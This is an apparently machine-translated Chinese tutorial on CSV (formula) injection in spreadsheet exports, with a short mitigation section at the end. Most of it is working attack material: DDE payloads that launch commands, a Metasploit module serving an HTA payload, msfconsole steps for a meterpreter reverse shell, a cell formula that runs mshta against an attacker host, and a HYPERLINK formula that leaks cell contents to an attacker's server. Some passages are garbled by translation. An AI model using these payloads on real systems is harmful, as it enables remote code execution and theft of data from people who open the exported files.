Vulnerability introduction
CSV Injection (CSV Injection) vulnerabilities usually appear in websites that have the function of exporting files (.csv/.xls). When the content of the exported file is controllable, the attacker usually injects malicious payload (formula) into the input field. After the user exports the file, EXCEL will call its own dynamic function to execute the attacker's malicious code to control the user's computer.
Vulnerability principle
Create an xls file and enter it in the cell. =1+1
After pressing Enter, you can see that the value has changed to 2, indicating that the plus sign is executed as an operation.
Of course, not only +
numbers can perform calculations, =、-、@
such symbols will also be parsed into formulas by excel.
DDE(Dynamic Data Exchange)
DDE is an inter-process communication protocol under Windows. It is a dynamic data exchange mechanism. Using DDE communication requires two Windows applications, one of which is used as a server to process information, and the other as a client to obtain information from the server. DDE supports Microsoft Excel, LibreOffice and Apache OpenOffice. Excel, Word, Rtf, Outlook can all use this mechanism to update content based on the processing results of external applications. Therefore, if we make a CSV file containing DDE formulas, then when the file is opened, Excel will try to execute an external application.
Invoking DDE needs to 文件->选项->信任中心->信任中心设置->外部内容
be turned on in:
By default, uncheck "Enable dynamic data exchange server startup (not recommended)" to prevent DDE from starting external applications. Older versions such as office 2016 MSO (16.0.4266.1001) do not have this option, so the execution of external programs cannot be prohibited.
Vulnerability demonstration
Type in the cell, =1*cmd|' /C calc'!A0
and you will find two pop-up windows:
When you don’t pay attention, you are crazy 是
, then a system command will be executed at this time, and the calculator will pop up.
Exploit
Visit a malicious website (phishing)
=HYPERLINK("http://baidu.com","还记得我吗老baby?我想你了!!!")
用户点击链接时,系统会调用浏览器访问这个网站。
This is a bit of help and requires the victim to manually click on the link. But this formula will not trigger a warning.
Of course, you can also cooperate with IE browser vulnerabilities, Flash and other vulnerabilities to obtain shell
Reverse shell
Attack machine: kali
target machine: windows 10
Without building a web page vulnerability template, we can directly create Excel and execute it on the target machine.
kali操作:
Copy the following ruby code to the /usr/share/metasploit-framework/modules/exploits/windows/smb/msh_shell.rb directory
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer
def initialize(info = {
})
super(update_info(info,
'Name' => 'Microsoft Office Payload Delivery',
'Description' => %q{
This module generates an command to place within
a word document, that when executed, will retrieve a HTA payload
via HTTP from an web server. Currently have not figured out how
to generate a doc.
},
'License' => MSF_LICENSE,
'Arch' => ARCH_X86,
'Platform' => 'win',
'Targets' =>
[
['Automatic', {
} ],
],
'DefaultTarget' => 0,
))
end
def on_request_uri(cli, _request)
print_status("Delivering payload")
p = regenerate_payload(cli)
data = Msf::Util::EXE.to_executable_fmt(
framework,
ARCH_X86,
'win',
p.encoded,
'hta-psh',
{
:arch => ARCH_X86, :platform => 'win '}
)
send_response(cli, data, 'Content-Type' => 'application/hta')
end
def primer
url = get_uri
print_status("Place the following DDE in an MS document:")
print_line("mshta.exe \"#{
url}\"")
end
end
Open the pg database:
service postgresql start
Start msf:
msfconsole
msfconsole operation:
#重置数据库
reload_all
#查询新建msh_shell模块
search msh_shell
#加载 msh_shell模块
use exploit/windows/smb/msh_shell
#设置监听payload,设置ip等
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.206.128
set uripath csv
exploit
Create a new Excel table and insert the following payload into the cell:
+1+cmd|'/c mshta.exe http://192.168.206.128:8080/csv'!A0
Upload it to windows10, and then open it. When the user is crazy 是
, our target machine
goes online. MSF gets shell permissions:
sessions -l
sessions -i 1
shell
Steal other cell information
The attacker turns on the web log function:
Take the tomcat log as an example, edit the server.xml file under conf, uncomment
the following content, and inject the following content
payload into Excel :
=HYPERLINK("http://192.168.206.130:8080/"&D2&D3,"Error: Please click me!")
When the user accidentally clicks on the content of a cell after exporting the report, the content of the D2 and D3 cells will be leaked.
View the tomcat web log:
Actual combat loopholes reproduce
CVE-2018-10504
CVE-2019-15092
Defensive measures
This type of attack is difficult to mitigate, and it is explicitly prohibited from many bug bounty programs. To fix it, make sure that no cell starts with any of the following characters:
Equal to ("=")
plus sign ("+")
minus sign ("-")
in ("@")
Developers can add an apostrophe (') at the beginning of cells containing such characters. Adding an apostrophe (') will tell excel that the cell does not contain a formula, and when viewing MS Excel, the apostrophe (') will not be displayed when entered as the first character in the cell.
Reference link
https://www.freebuf.com/vuls/195656.html
https://blog.csdn.net/qq_34304003/article/details/87635582
https://www.veracode.com/blog/secure-development/data-extraction-command-execution-csv-injection
https://www.anquanke.com/post/id/84497
http://kuaiyaojinga.com/110057477
https://www.anquanke.com/post/id/89972
https://xz.aliyun.com/t/4124
https://galaxylab.com.cn/formula-injection-%E5%85%AC%E5%BC%8F%E6%B3%A8%E5%85%A5/